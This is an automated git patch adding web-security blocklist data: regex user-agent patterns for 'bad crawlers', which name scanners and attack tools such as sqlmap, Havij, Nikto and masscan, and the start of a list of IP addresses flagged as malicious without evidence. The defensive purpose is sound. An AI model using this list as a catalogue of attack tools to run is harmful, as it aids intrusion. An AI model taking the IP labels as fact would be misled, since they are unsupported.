From 75b17f2339e8257fe414487edac87ba4d7cef026 Mon Sep 17 00:00:00 2001
From: ghost <ghost@users.noreply.github.com>
Date: Thu, 5 Sep 2024 00:47:15 +0000
Subject: [PATCH] build: Update DB [Thu Sep  5 00:47:15 UTC 2024]

---
 README.md                    |     8 +-
 db/MD5SUMS                   |     7 +
 db/bad-crawlers.txt          |  1410 +++
 db/bad-ip-addresses.txt      | 19615 +++++++++++++++++++++++++++++++++
 db/bad-referrers.txt         |  7105 ++++++++++++
 db/common-web-attacks.json   |     1 +
 db/cves.json                 |     1 +
 db/db.tar.zst                |   Bin 0 -> 545173 bytes
 db/directory-bruteforces.txt |  5331 +++++++++
 9 files changed, 33474 insertions(+), 4 deletions(-)
 create mode 100644 db/MD5SUMS
 create mode 100644 db/bad-crawlers.txt
 create mode 100644 db/bad-ip-addresses.txt
 create mode 100644 db/bad-referrers.txt
 create mode 100644 db/common-web-attacks.json
 create mode 100644 db/cves.json
 create mode 100644 db/db.tar.zst
 create mode 100644 db/directory-bruteforces.txt

diff --git a/README.md b/README.md
index fdc30707..d8b2ecd3 100644
--- a/README.md
+++ b/README.md
@@ -9,15 +9,15 @@ This collection serves as the primary repository of external resources/datasets
 |     **Datasets**     | **Count** |
 | -------------------- | --------- |
 | Common Web Attack    | 76      |
-| CVEs                 | 2577      |
-| Bad IP Address       | 19252      |
+| CVEs                 | 2579      |
+| Bad IP Address       | 19615      |
 | Bad Referrer         | 7104      |
 | Bad Crawler          | 1409      |
 | Directory Bruteforce | 5331      |
-|       **Total**      | **35749**      |
+|       **Total**      | **36114**      |
 
 > [!NOTE]
-> Last updated at **Wed Sep  4 00:47:10 UTC 2024**.
+> Last updated at **Thu Sep  5 00:47:15 UTC 2024**.
 
 ## Contributions
 
diff --git a/db/MD5SUMS b/db/MD5SUMS
new file mode 100644
index 00000000..2fb57ea9
--- /dev/null
+++ b/db/MD5SUMS
@@ -0,0 +1,7 @@
+600f383cdca9cb03645f51f07864cdc7  bad-crawlers.txt
+a66044bcceb8b4652d2c3a21cf274c51  bad-ip-addresses.txt
+8f186aa10b19ce75203890934508f9e1  bad-referrers.txt
+394f8e08f61e118f284f899558f6629f  common-web-attacks.json
+1bb7dbac19fc2fbecb2ed578d99eabfc  cves.json
+1e2e6505cc28425b325e77c62a7f7c6c  db.tar.zst
+267a3613bc77c10c6586949e086e8c92  directory-bruteforces.txt
diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt
new file mode 100644
index 00000000..a3edf95c
--- /dev/null
+++ b/db/bad-crawlers.txt
@@ -0,0 +1,1410 @@
+ YLT
+^Aether
+^Amazon Simple Notification Service Agent$
+^Amazon-Route53-Health-Check-Service
+^Amazon CloudFront
+^b0t$
+^bluefish 
+^Calypso v\/
+^COMODO DCV
+^Corax
+^DangDang
+^DavClnt
+^DHSH
+^docker\/[0-9]
+^Expanse
+^FDM 
+^git\/
+^Goose\/
+^Grabber
+^Gradle\/
+^HTTPClient\/
+^HTTPing
+^Java\/
+^Jeode\/
+^Jetty\/
+^Mail\/
+^Mget
+^Microsoft URL Control
+^Mikrotik\/
+^Netlab360
+^NG\/[0-9\.]
+^NING\/
+^npm\/
+^Nuclei
+^PHP-AYMAPI\/
+^PHP\/
+^pip\/
+^pnpm\/
+^RMA\/
+^Ruby|Ruby\/[0-9]
+^Swurl 
+^TLS tester 
+^twine\/
+^ureq
+^VSE\/[0-9]
+^WordPress\.com
+^XRL\/[0-9]
+^ZmEu
+008\/
+13TABS
+192\.comAgent
+2GDPR\/
+2ip\.ru
+404enemy
+7Siters
+80legs
+a3logics\.in
+A6-Indexer
+Abonti
+Aboundex
+aboutthedomain
+Accoona-AI-Agent
+acebookexternalhit\/
+acoon
+acrylicapps\.com\/pulp
+Acunetix
+AdAuth\/
+adbeat
+AddThis
+ADmantX
+AdminLabs
+adressendeutschland
+adreview\/
+adscanner
+adstxt-worker
+Adstxtaggregator
+adstxt\.com
+Adyen HttpClient
+AffiliateLabz\/
+affilimate-puppeteer
+agentslug
+AHC
+aihit
+aiohttp\/
+Airmail
+akka-http\/
+akula\/
+alertra
+alexa site audit
+Alibaba\.Security\.Heimdall
+Alligator
+allloadin
+AllSubmitter
+alyze\.info
+amagit
+Anarchie
+AndroidDownloadManager
+Anemone
+AngleSharp
+annotate_google
+Anthill
+Anturis Agent
+Ant\.com
+AnyEvent-HTTP\/
+Apache Ant\/
+Apache Droid
+Apache OpenOffice
+Apache-HttpAsyncClient
+Apache-HttpClient
+ApacheBench
+Apexoo
+apimon\.de
+APIs-Google
+AportWorm\/
+AppBeat\/
+AppEngine-Google
+AppleSyndication
+Aprc\/[0-9]
+Arachmo
+arachnode
+Arachnophilia
+aria2
+Arukereso
+asafaweb
+Asana\/
+Ask Jeeves
+AskQuickly
+ASPSeek
+Asterias
+Astute
+asynchttp
+Attach
+attohttpc
+autocite
+AutomaticWPTester
+Autonomy
+awin\.com
+AWS Security Scanner
+axios\/
+a\.pr-cy\.ru
+B-l-i-t-z-B-O-T
+Backlink-Ceck
+BacklinkHttpStatus
+BackStreet
+BackupLand
+BackWeb
+Bad-Neighborhood
+Badass
+baidu\.com
+Bandit
+basicstate
+BatchFTP
+Battleztar Bazinga
+baypup\/
+BazQux
+BBBike
+BCKLINKS
+BDFetch
+BegunAdvertising
+Bewica-security-scan
+Bidtellect
+BigBozz
+Bigfoot
+biglotron
+BingLocalSearch
+BingPreview
+binlar
+biNu image cacher
+Bitacle
+Bitrix link preview
+biz_Directory
+BKCTwitterUnshortener\/
+Black Hole
+Blackboard Safeassign
+BlackWidow
+BlockNote\.Net
+BlogBridge
+Bloglines
+Bloglovin
+BlogPulseLive
+BlogSearch
+Blogtrottr
+BlowFish
+boitho\.com-dc
+Boost\.Beast
+BPImageWalker
+Braintree-Webhooks
+Branch Metrics API
+Branch-Passthrough
+Brandprotect
+Brandwatch
+Brodie\/
+Browsershots
+BUbiNG
+Buck\/
+Buddy
+BuiltWith
+Bullseye
+BunnySlippers
+Burf Search
+Butterfly\/
+BuzzSumo
+CAAM\/[0-9]
+CakePHP
+Calculon
+Canary%20Mail
+CaretNail
+catexplorador
+CC Metadata Scaper
+Cegbfeieh
+censys
+centuryb.o.t9[at]gmail.com
+Cerberian Drtrs
+CERT\.at-Statistics-Survey
+cf-facebook
+cg-eye
+changedetection
+ChangesMeter
+Charlotte
+chatterino-api-cache
+CheckHost
+checkprivacy
+CherryPicker
+ChinaClaw
+Chirp\/
+chkme\.com
+Chlooe
+Chromaxa
+CirrusExplorer
+CISPA Vulnerability Notification
+CISPA Web Analyser
+Citoid
+CJNetworkQuality
+Clarsentia
+clips\.ua\.ac\.be
+Cloud mapping
+CloudEndure
+CloudFlare-AlwaysOnline
+Cloudflare-Healthchecks
+Cloudinary
+cmcm\.com
+coccoc
+cognitiveseo
+ColdFusion
+colly -
+CommaFeed
+Commons-HttpClient
+commonscan
+contactbigdatafr
+contentkingapp
+Contextual Code Sites Explorer
+convera
+CookieReports
+copyright sheriff
+CopyRightCheck
+Copyscape
+cortex\/
+Cosmos4j\.feedback
+Covario-IDS
+Craw\/
+Crescent
+Criteo
+Crowsnest
+CSHttp
+CSSCheck
+Cula\/
+curb
+Curious George
+curl
+cuwhois\/
+cybo\.com
+DAP\/NetHTTP
+DareBoost
+DatabaseDriverMysqli
+DataCha0s
+DatadogSynthetics
+Datafeedwatch
+Datanyze
+DataparkSearch
+dataprovider
+DataXu
+Daum(oa)?[ \/][0-9]
+dBpoweramp
+ddline
+deeris
+delve\.ai
+Demon
+DeuSu
+developers\.google\.com\/\+\/web\/snippet\/
+Devil
+Digg
+Digincore
+DigitalPebble
+Dirbuster
+Discourse Forum Onebox
+Dispatch\/
+Disqus\/
+DittoSpyder
+dlvr
+DMBrowser
+DNSPod-reporting
+docoloc
+Dolphin http client
+DomainAppender
+DomainLabz
+Domains Project\/
+Donuts Content Explorer
+dotMailer content retrieval
+dotSemantic
+downforeveryoneorjustme
+Download Wonder
+downnotifier
+DowntimeDetector
+Drip
+drupact
+Drupal \(\+http:\/\/drupal\.org\/\)
+DTS Agent
+dubaiindex
+DuplexWeb-Google
+DynatraceSynthetic
+EARTHCOM
+Easy-Thumb
+EasyDL
+Ebingbong
+ec2linkfinder
+eCairn-Grabber
+eCatch
+ECCP
+eContext\/
+Ecxi
+EirGrabber
+ElectricMonk
+elefent
+EMail Exractor
+EMail Wolf
+EmailWolf
+Embarcadero
+Embed PHP Library
+Embedly
+endo\/
+europarchive\.org
+evc-batch
+EventMachine HttpClient
+Everwall Link Expander
+Evidon
+Evrinid
+ExactSearch
+ExaleadCloudview
+Excel\/
+exif
+ExoRank
+Exploratodo
+Express WebPictures
+Extreme Picture Finder
+EyeNetIE
+ezooms
+facebookcatalog
+facebookexternalhit
+facebookexternalua
+facebookplatform
+fairshare
+Faraday v
+fasthttp
+Faveeo
+Favicon downloader
+faviconarchive
+faviconkit
+FavOrg
+Feed Wrangler
+Feedable\/
+Feedbin
+FeedBooster
+FeedBucket
+FeedBunch\/
+FeedBurner
+feeder
+Feedly
+FeedshowOnline
+Feedshow\/
+Feedspot
+FeedViewer\/
+Feedwind\/
+FeedZcollector
+feeltiptop
+Fetch API
+Fetch\/[0-9]
+Fever\/[0-9]
+FHscan
+Fiery%20Feeds
+Filestack
+Fimap
+findlink
+findthatfile
+FlashGet
+FlipboardBrowserProxy
+FlipboardProxy
+FlipboardRSS
+Flock\/
+Florienzh\/
+fluffy
+Flunky
+flynxapp
+forensiq
+ForusP
+FoundSeoTool
+fragFINN\.de
+free thumbnails
+Freeuploader
+FreshRSS
+frontman
+Funnelback
+Fuzz Faster U Fool
+G-i-g-a-b-o-t
+g00g1e\.net
+ganarvisitas
+gdnplus\.com
+GeedoProductSearch
+geek-tools
+Genieo
+GentleSource
+GetCode
+Getintent
+GetLinkInfo
+getprismatic
+GetRight
+getroot
+GetURLInfo\/
+GetWeb
+Geziyor
+Ghost Inspector
+GigablastOpenSource
+GIS-LABS
+github-camo
+GitHub-Hookshot
+github\.com
+Go http package
+Go [\d\.]* package http
+Go!Zilla
+Go-Ahead-Got-It
+Go-http-client
+go-mtasts\/
+gobuster
+gobyus
+Gofeed
+gofetch
+Goldfire Server
+GomezAgent
+gooblog
+Goodzer\/
+Google AppsViewer
+Google Desktop
+Google favicon
+Google Keyword Suggestion
+Google Keyword Tool
+Google Page Speed Insights
+Google PP Default
+Google Search Console
+Google Web Preview
+Google-Ads
+Google-Adwords
+Google-Apps-Script
+Google-Calendar-Importer
+Google-HotelAdsVerifier
+Google-HTTP-Java-Client
+Google-InspectionTool
+Google-Podcast
+Google-Publisher-Plugin
+Google-Read-Aloud
+Google-SearchByImage
+Google-Site-Verification
+Google-SMTP-STS
+Google-speakr
+Google-Structured-Data-Testing-Tool
+Google-Transparency-Report
+google-xrawler
+Google-Youtube-Links
+GoogleDocs
+GoogleHC\/
+GoogleOther
+GoogleProber
+GoogleProducer
+GoogleSites
+Gookey
+GoSpotCheck
+gosquared-thumbnailer
+Gotit
+GoZilla
+grabify
+GrabNet
+Grafula
+Grammarly
+GrapeFX
+GreatNews
+Gregarius
+GRequests
+grokkit
+grouphigh
+grub-client
+gSOAP\/
+GT::WWW
+GTmetrix
+GuzzleHttp
+gvfs\/
+HAA(A)?RTLAND http client
+Haansoft
+hackney\/
+Hadi Agent
+HappyApps-WebCheck
+Hardenize
+Hatena
+Havij
+HaxerMen
+HeadlessChrome
+HEADMasterSEO
+HeartRails_Capture
+help@dataminr\.com
+heritrix
+Hexometer
+historious
+hkedcity
+hledejLevne\.cz
+Hloader
+HMView
+Holmes
+HonesoSearchEngine
+HootSuite Image proxy
+Hootsuite-WebFeed
+hosterstats
+HostTracker
+ht:\/\/check
+htdig
+HTMLparser
+htmlyse
+HTTP Banner Detection
+http-get
+HTTP-Header-Abfrage
+http-kit
+http-request\/
+HTTP-Tiny
+HTTP::Lite
+http:\/\/www.neomo.de\/
+HttpComponents
+httphr
+HTTPie
+HTTPMon
+httpRequest
+httpscheck
+httpssites_power
+httpunit
+HttpUrlConnection
+http\.rb\/
+HTTP_Compression_Test
+http_get
+http_request2
+http_requester
+httrack
+huaweisymantec
+HubSpot 
+HubSpot-Link-Resolver
+Humanlinks
+i2kconnect\/
+Iblog
+ichiro
+Id-search
+IdeelaborPlagiaat
+IDG Twitter Links Resolver
+IDwhois\/
+Iframely
+igdeSpyder
+iGooglePortal
+IlTrovatore
+Image Fetch
+Image Sucker
+ImageEngine\/
+ImageVisu\/
+Imagga
+imagineeasy
+imgsizer
+InAGist
+inbound\.li parser
+InDesign%20CC
+Indy Library
+InetURL
+infegy
+infohelfer
+InfoTekies
+InfoWizards Reciprocal Link
+inpwrd\.com
+instabid
+Instapaper
+Integrity
+integromedb
+Intelliseek
+InterGET
+Internet Ninja
+InternetSeer
+internetVista monitor
+internetwache
+internet_archive
+intraVnews
+IODC
+IOI
+Inboxb0t
+iplabel
+ips-agent
+IPS\/[0-9]
+IPWorks HTTP\/S Component
+iqdb\/
+Iria
+Irokez
+isitup\.org
+iskanie
+isUp\.li
+iThemes Sync\/
+IZaBEE
+iZSearch
+JAHHO
+janforman
+Jaunt\/
+Java.*outbrain
+javelin\.io
+Jbrofuzz
+Jersey\/
+JetCar
+Jigsaw
+Jobboerse
+JobFeed discovery
+Jobg8 URL Monitor
+jobo
+Jobrapido
+Jobsearch1\.5
+JoinVision Generic
+JolokiaPwn
+Joomla
+Jorgee
+JS-Kit
+JungleKeyThumbnail
+JustView
+Kaspersky Lab CFR link resolver
+Kelny\/
+Kerrigan\/
+KeyCDN
+Keyword Density
+Keywords Research
+khttp\/
+KickFire
+KimonoLabs\/
+Kml-Google
+knows\.is
+KOCMOHABT
+kouio
+kube-probe
+kubectl
+kulturarw3
+KumKie
+Larbin
+Lavf\/
+leakix\.net
+LeechFTP
+LeechGet
+letsencrypt
+Lftp
+LibVLC
+LibWeb
+Libwhisker
+libwww
+Licorne
+Liferea\/
+Lighthouse
+Lightspeedsystems
+Likse
+limber\.io
+Link Valet
+LinkAlarm\/
+LinkAnalyser
+link-check
+linkCheck
+linkdex
+LinkExaminer
+linkfluence
+linkpeek
+LinkPreview
+LinkScan
+LinksManager
+LinkTiger
+LinkWalker
+link_thumbnailer
+Lipperhey
+Litemage_walker
+livedoor ScreenShot
+LoadImpactRload
+localsearch-web
+LongURL API
+longurl-r-package
+looid\.com
+looksystems\.net
+lscache_runner
+ltx71
+lua-resty-http
+Lucee \(CFML Engine\)
+Lush Http Client
+lwp-request
+lwp-trivial
+LWP::Simple
+lycos
+LYT\.SR
+L\.webis
+mabontland
+MacOutlook\/
+Mag-Net
+MagpieRSS
+Mail::STS
+MailChimp
+Mail\.Ru
+Majestic12
+makecontact\/
+Mandrill
+MapperCmd
+marketinggrader
+MarkMonitor
+MarkWatch
+Mass Downloader
+masscan\/
+Mata Hari
+mattermost
+Mediametric
+Mediapartners-Google
+mediawords
+MegaIndex\.ru
+MeltwaterNews
+Melvil Rawi
+MemGator
+Metaspinner
+MetaURI
+MFC_Tear_Sample
+Microsearch
+Microsoft Data Access
+Microsoft Office
+Microsoft Outlook
+Microsoft Windows Network Diagnostics
+Microsoft-WebDAV-MiniRedir
+Microsoft\.Data\.Mashup
+MicrosoftPreview
+MIDown tool
+MIIxpc
+Mindjet
+Miniature\.io
+Miniflux
+mio_httpc
+Miro-HttpClient
+Mister PiX
+mixdata dot com
+mixed-content-scan
+mixnode
+Mnogosearch
+mogimogi
+Mojeek
+Mojolicious \(Perl\)
+Mollie
+monitis
+Monitority\/
+Monit\/
+montastic
+MonTools
+Moreover
+Morfeus Fucking Scanner
+Morning Paper
+MovableType
+mowser
+Mrcgiguy
+Mr\.4x3 Powered
+MS Web Services Client Protocol
+MSFrontPage
+mShots
+MuckRack\/
+muhstik-scan
+MVAClient
+MxToolbox\/
+myseosnapshot
+nagios
+Najdi\.si
+Name Intelligence
+NameFo\.com
+Nameprotect
+nationalarchives
+Navroad
+nbertaupete95
+NearSite
+Needle
+Nessus
+Net Vampire
+NetAnts
+NETCRAFT
+NetLyzer
+NetMechanic
+NetNewsWire
+Netpursual
+netresearch
+NetShelter ContentScan
+Netsparker
+NetSystemsResearch
+nettle
+NetTrack
+Netvibes
+NetZIP
+Neustar WPM
+NeutrinoAPI
+NewRelicPinger
+NewsBlur .*Finder
+NewsGator
+newsme
+newspaper\/
+Nexgate Ruby Client
+NG-Search
+nghttp2
+Nibbler
+NICErsPRO
+NihilScio
+Nikto
+nineconnections
+NLNZ_IAHarvester
+Nmap Scripting Engine
+node-fetch
+node-superagent
+node-urllib
+Nodemeter
+NodePing
+node\.io
+nominet\.org\.uk
+nominet\.uk
+Norton-Safeweb
+Notifixious
+notifyninja
+NotionEmbedder
+nuhk
+nutch
+Nuzzel
+nWormFeedFinder
+nyawc\/
+Nymesis
+NYU
+Observatory\/
+Ocelli\/
+Octopus
+oegp
+Offline Explorer
+Offline Navigator
+OgScrper
+okhttp
+omgili
+OMSC
+Online Domain Tools
+Open Source RSS
+OpenCalaisSemanticProxy
+Openfind
+OpenLinkProfiler
+Openstat\/
+OpenVAS
+OPPO A33
+Optimizer
+Orbiter
+OrgProbe\/
+orion-semantics
+Outlook-Express
+Outlook-iOS
+Owler
+Owlin
+ownCloud News
+ow\.ly
+OxfordCloudService
+page scorer
+Page Valet
+page2rss
+PageFreezer
+PageGrabber
+PagePeeker
+PageScorer
+Pagespeed\/
+PageThing
+page_verifier
+Panopta
+panscient
+Papa Foto
+parsijoo
+Pavuk
+PayPal IPN
+pcBrowser
+Pcore-HTTP
+PDF24 URL To PDF
+Pearltrees
+PECL::HTTP
+peerindex
+Peew
+PeoplePal
+Perlu -
+PhantomJS Screenshoter
+PhantomJS\/
+Photon\/
+php-requests
+phpservermon
+Pi-Monster
+Picscout
+Picsearch
+PictureFinder
+Pimonster
+Pingability
+PingAdmin\.Ru
+Pingdom
+Pingoscope
+PingSpot
+ping\.blo\.gs
+pinterest\.com
+Pixray
+Pizilla
+Plagger\/
+Pleroma 
+Ploetz \+ Zeller
+Plukkie
+plumanalytics
+PocketImageCache
+PocketParser
+Pockey
+PodcastAddict\/
+POE-Component-Client-HTTP
+Polymail\/
+Pompos
+Porkbun
+Port Monitor
+postano
+postfix-mta-sts-resolver
+PostmanRuntime
+postplanner\.com
+PostPost
+postrank
+PowerPoint\/
+Prebid
+Prerender
+Priceonomics Analysis Engine
+PrintFriendly
+PritTorrent
+Prlog
+probely\.com
+probethenet
+Project ?25499
+Project-Resonance
+prospectb2b
+Protopage
+ProWebWalker
+proximic
+PRTG Network Monitor
+pshtt, https scanning
+PTST 
+PTST\/[0-9]+
+pulsetic\.com
+Pump
+Python-httplib2
+python-httpx
+python-requests
+Python-urllib
+Qirina Hurdler
+QQDownload
+QrafterPro
+Qseero
+Qualidator
+QueryN Metasearch
+queuedriver
+quic-go-HTTP\/
+QuiteRSS
+Quora Link Preview
+Qwantify
+Radian6
+RadioPublicImageResizer
+Railgun\/
+RankActive
+RankFlex
+RankSonicSiteAuditor
+RapidLoad\/
+Re-re Studio
+ReactorNetty
+Readability
+RealDownload
+RealPlayer%20Downloader
+RebelMouse
+Recorder
+RecurPost\/
+redback\/
+ReederForMac
+Reeder\/
+ReGet
+RepoMonkey
+request\.js
+reqwest\/
+ResponseCodeTest
+RestSharp
+Riddler
+Rival IQ
+Robosourcer
+Robozilla
+ROI Hunter
+RPT-HTTPClient
+RSSMix\/
+RSSOwl
+RyowlEngine
+safe-agent-scanner
+SalesIntelligent
+Saleslift
+SAP NetWeaver Application Server
+SauceNAO
+SBIder
+sc-downloader
+scalaj-http
+Scamadviser-Frontend
+ScanAlert
+scan\.lol
+Scoop
+scooter
+ScopeContentAG-HTTP-Client
+ScoutJet
+ScoutURLMonitor
+ScrapeBox Page Scanner
+Scrapy
+Screaming
+ScreenShotService
+Scrubby
+Scrutiny\/
+Search37
+searchenginepromotionhelp
+Searchestate
+SearchExpress
+SearchSight
+SearchWP
+search\.thunderstone
+Seeker
+semanticdiscovery
+semanticjuice
+Semiocast HTTP client
+Semrush
+Sendsay\.Ru
+sentry\/
+SEO Browser
+Seo Servis
+seo-nastroj\.cz
+seo4ajax
+Seobility
+SEOCentro
+SeoCheck
+seocompany
+SEOkicks
+SEOlizer
+Seomoz
+SEOprofiler
+seoscanners
+SEOsearch
+seositecheckup
+SEOstats
+servernfo
+sexsearcher
+Seznam
+Shelob
+Shodan
+Shoppimon
+ShopWiki
+ShortLinkTranslate
+shortURL lengthener
+shrinktheweb
+Sideqik
+Siege
+SimplePie
+SimplyFast
+Siphon
+SISTRIX
+Site Sucker
+Site-Shot\/
+Site24x7
+SiteBar
+Sitebeam
+Sitebulb\/
+SiteCondor
+SiteExplorer
+SiteGuardian
+Siteimprove
+SiteIndexed
+Sitemap(s)? Generator
+SitemapGenerator
+SiteMonitor
+Siteshooter B0t
+SiteSnagger
+SiteSucker
+SiteTruth
+Sitevigil
+sitexy\.com
+SkypeUriPreview
+Slack\/
+sli-systems\.com
+slider\.com
+slurp
+SlySearch
+SmartDownload
+SMRF URL Expander
+SMUrlExpander
+Snake
+Snappy
+SnapSearch
+Snarfer\/
+SniffRSS
+sniptracker
+Snoopy
+SnowHaze Search
+sogou web
+SortSite
+Sottopop
+sovereign\.ai
+SpaceBison
+SpamExperts
+Spammen
+Spanner
+Spawning-AI
+spaziodati
+SPDYCheck
+Specificfeeds
+SpeedKit
+speedy
+SPEng
+Spinn3r
+spray-can
+Sprinklr 
+spyonweb
+sqlmap
+Sqlworm
+Sqworm
+SSL Labs
+ssl-tools
+StackRambler
+Statastico\/
+Statically-
+StatusCake
+Steeler
+Stratagems Kumo
+Stripe\/
+Stroke\.cz
+StudioFACA
+StumbleUpon
+suchen
+Sucuri
+summify
+SuperHTTP
+Surphace Scout
+Suzuran
+swcd 
+Symfony BrowserKit
+Symfony2 BrowserKit
+Synapse\/
+Syndirella\/
+SynHttpClient-Built
+Sysomos
+sysscan
+Szukacz
+T0PHackTeam
+tAkeOut
+Tarantula\/
+Taringa UGC
+TarmotGezgin
+tchelebi\.io
+techiaith\.cymru
+Teleport
+Telesoft
+Telesphoreo
+Telesphorep
+Tenon\.io
+teoma
+terrainformatica
+Test Certificate Info
+testuri
+Tetrahedron
+TextRazor Downloader
+The Drop Reaper
+The Expert HTML Source Viewer
+The Intraformant
+The Knowledge AI
+theinternetrules
+TheNomad
+Thinklab
+Thumbor
+Thumbshots
+ThumbSniper
+timewe\.net
+TinEye
+Tiny Tiny RSS
+TLSProbe\/
+Toata
+topster
+touche\.com
+Traackr\.com
+tracemyfile
+Trackuity
+TrapitAgent
+Trendiction
+Trendsmap
+trendspottr
+truwoGPS
+TryJsoup
+TulipChain
+Turingos
+Turnitin
+tweetedtimes
+Tweetminster
+Tweezler\/
+twibble
+Twice
+Twikle
+Twingly
+Twisted PageGetter
+Typhoeus
+ubermetrics-technologies
+uclassify
+UdmSearch
+ultimate_sitemap_parser
+unchaos
+unirest-java
+UniversalFeedParser
+unshortenit
+Unshorten\.It
+Untiny
+UnwindFetchor
+updated
+updown\.io daemon
+Upflow
+Uptimia
+URL Verifier
+Urlcheckr
+URLitor
+urlresolver
+Urlstat
+URLTester
+UrlTrends Ranking Updater
+URLy Warning
+URLy\.Warning
+URL\/Emacs
+Vacuum
+Vagabondo
+VB Project
+vBSEO
+VCI
+Verity
+via ggpht\.com GoogleImageProxy
+Virusdie
+visionutils
+Visual Rights Group
+vkShare
+VoidEYE
+Voil
+voltron
+voyager\/
+VSAgent\/
+VSB-TUO\/
+Vulnbusters Meter
+VYU2
+w3af\.org
+W3C-checklink
+W3C-mobileOK
+W3C_Unicorn
+WAC-OFU
+WakeletLinkExpander
+WallpapersHD
+Wallpapers\/[0-9]+
+wangling
+Wappalyzer
+WatchMouse
+WbSrch\/
+WDT\.io
+Web Auto
+Web Collage
+Web Enhancer
+Web Fetch
+Web Fuck
+Web Pix
+Web Sauger
+Web spyder
+Web Sucker
+web-capture\.net
+Web-sniffer
+Webalta
+Webauskunft
+WebAuto
+WebCapture
+WebClient\/
+webcollage
+WebCookies
+WebCopier
+WebCorp
+WebDataStats
+WebDoc
+WebEnhancer
+WebFetch
+WebFuck
+WebGazer
+WebGo IS
+WebImageCollector
+WebImages
+WebIndex
+webkit2png
+WebLeacher
+webmastercoffee
+webmon 
+WebPix
+WebReaper
+WebSauger
+webscreenie
+Webshag
+Webshot
+Website Quester
+websitepulse agent
+WebsiteQuester
+Websnapr
+WebSniffer
+Webster
+WebStripper
+WebSucker
+webtech\/
+WebThumbnail
+Webthumb\/
+WebWhacker
+WebZIP
+WeLikeLinks
+WEPA
+WeSEE
+wf84
+Wfuzz\/
+wget
+WhatCMS
+WhatsApp
+WhatsMyIP
+WhatWeb
+WhereGoes\?
+Whibse
+WhoAPI\/
+WhoRunsCoinHive
+Whynder Magnet
+Windows-RSS-Platform
+WinHttp-Autoproxy-Service
+WinHTTP\/
+WinPodder
+wkhtmlto
+wmtips
+Woko
+Wolfram HTTPClient
+woorankreview
+WordPress\/
+WordupinfoSearch
+Word\/
+worldping-api
+wotbox
+WP Engine Install Performance API
+WP Rocket
+wpif
+wprecon\.com survey
+WPScan
+wscheck
+Wtrace
+WWW-Collector-E
+WWW-Mechanize
+WWW::Document
+WWW::Mechanize
+WWWOFFLE
+www\.monitor\.us
+x09Mozilla
+x22Mozilla
+XaxisSemanticsClassifier
+XenForo\/
+Xenu Link Sleuth
+XING-contenttabreceiver
+xpymep([0-9]?)\.exe
+Y!J-[A-Z][A-Z][A-Z]
+Yaanb
+yacy
+Yahoo Link Preview
+YahooCacheSystem
+YahooMailProxy
+YahooYSMcm
+YandeG
+Yandex(?!Search)
+yanga
+yeti
+Yo-yo
+Yoleo Consumer
+yomins\.com
+yoogliFetchAgent
+YottaaMonitor
+Your-Website-Sucks
+yourls\.org
+YoYs\.net
+YP\.PL
+Zabbix
+Zade
+Zao
+Zapier
+Zauba
+Zemanta Aggregator
+Zend\\Http\\Client
+Zend_Http_Client
+Zermelo
+Zeus 
+zgrab
+ZnajdzFoto
+ZnHTTP
+Zombie\.js
+Zoom\.Mac
+ZoteroTranslationServer
+ZyBorg
+[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper)
\ No newline at end of file
diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt
new file mode 100644
index 00000000..c0a23fab
--- /dev/null
+++ b/db/bad-ip-addresses.txt
@@ -0,0 +1,19615 @@
+1.11.62.197
+1.116.136.219
+1.119.137.226
+1.12.230.7
+1.12.60.59
+1.13.79.144
+1.13.9.191
+1.14.106.223
+1.14.177.4
+1.15.228.189
+1.15.235.80
+1.162.235.140
+1.162.238.240
+1.164.102.207
+1.164.106.124
+1.164.126.143
+1.164.98.150
+1.174.20.156
+1.179.128.124
+1.180.189.210
+1.180.97.138
+1.180.98.210
+1.183.13.194
+1.188.72.212
+1.189.209.21
+1.190.203.26
+1.197.78.123
+1.212.225.99
+1.214.195.229
+1.214.197.163
+1.215.240.130
+1.218.138.131
+1.220.64.218
+1.227.83.22
+1.227.83.33
+1.232.29.63
+1.234.31.117
+1.234.58.179
+1.234.58.189
+1.234.58.234
+1.234.58.235
+1.235.192.130
+1.235.192.131
+1.237.137.30
+1.238.106.229
+1.245.207.104
+1.252.63.242
+1.26.70.70
+1.27.171.46
+1.28.192.118
+1.28.192.150
+1.28.194.22
+1.28.80.2
+1.28.87.246
+1.28.87.38
+1.30.20.238
+1.30.20.98
+1.31.80.166
+1.31.80.222
+1.31.87.230
+1.34.230.46
+1.34.85.243
+1.36.65.151
+1.53.122.14
+1.55.33.86
+1.69.104.94
+1.69.115.168
+1.69.23.237
+1.69.41.78
+1.69.44.156
+1.69.45.252
+1.69.46.232
+1.69.63.187
+1.69.73.3
+1.69.96.8
+1.7.229.162
+1.70.10.135
+1.70.10.190
+1.70.10.253
+1.70.10.47
+1.70.10.90
+1.70.100.53
+1.70.103.229
+1.70.11.238
+1.70.12.104
+1.70.125.144
+1.70.125.193
+1.70.126.164
+1.70.127.182
+1.70.128.189
+1.70.133.68
+1.70.137.246
+1.70.139.148
+1.70.14.243
+1.70.14.36
+1.70.14.64
+1.70.140.145
+1.70.143.107
+1.70.158.32
+1.70.161.26
+1.70.163.249
+1.70.163.25
+1.70.163.88
+1.70.165.193
+1.70.169.100
+1.70.169.243
+1.70.186.99
+1.70.188.180
+1.70.188.33
+1.70.191.49
+1.70.8.191
+1.70.80.212
+1.70.80.99
+1.70.81.159
+1.70.82.38
+1.70.83.77
+1.70.84.116
+1.70.84.246
+1.70.85.200
+1.70.86.74
+1.70.9.10
+1.70.9.124
+1.71.134.111
+1.71.2.174
+1.82.191.110
+1.82.191.114
+1.82.217.54
+1.83.124.4
+1.85.42.195
+1.94.134.80
+1.94.60.32
+100.15.97.125
+100.2.86.11
+100.29.192.1
+100.29.192.10
+100.29.192.100
+100.29.192.101
+100.29.192.102
+100.29.192.103
+100.29.192.104
+100.29.192.105
+100.29.192.106
+100.29.192.107
+100.29.192.108
+100.29.192.109
+100.29.192.110
+100.29.192.111
+100.29.192.112
+100.29.192.113
+100.29.192.117
+100.29.192.12
+100.29.192.120
+100.29.192.121
+100.29.192.124
+100.29.192.126
+100.29.192.127
+100.29.192.14
+100.29.192.16
+100.29.192.17
+100.29.192.18
+100.29.192.2
+100.29.192.21
+100.29.192.22
+100.29.192.24
+100.29.192.25
+100.29.192.27
+100.29.192.29
+100.29.192.3
+100.29.192.31
+100.29.192.32
+100.29.192.33
+100.29.192.36
+100.29.192.37
+100.29.192.39
+100.29.192.4
+100.29.192.40
+100.29.192.42
